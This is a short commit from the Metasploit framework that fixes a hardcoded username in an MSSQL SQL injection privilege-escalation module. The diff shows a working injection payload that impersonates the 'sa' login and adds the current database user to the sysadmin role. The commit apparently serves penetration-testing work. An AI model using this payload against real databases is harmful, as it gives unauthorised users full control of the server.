Land rapid7#4932, hardcoded username fix

wvu · wvu · commit ac0e23d78384 · 2015-03-16T01:46:13.000-05:00
For mssql_escalate_execute_as_sqli.
diff --git a/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb b/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb
@@ -190,10 +190,10 @@ def check_imp_sysadmin(imp_user_list)
   end
 
   # Attempt to escalate privileges
-  def escalate_privs(imp_user,db_user)
+  def escalate_privs(db_user)
 
     # Setup Query - Impersonate the first sysadmin user on the list
-    evil_sql = "1;EXECUTE AS LOGIN = 'sa';EXEC sp_addsrvrolemember 'MyUser1','sysadmin';Revert;--"
+    evil_sql = "1;EXECUTE AS LOGIN = 'sa';EXEC sp_addsrvrolemember '#{db_user}','sysadmin';Revert;--"
 
     # Execute Query
     mssql_query(evil_sql)
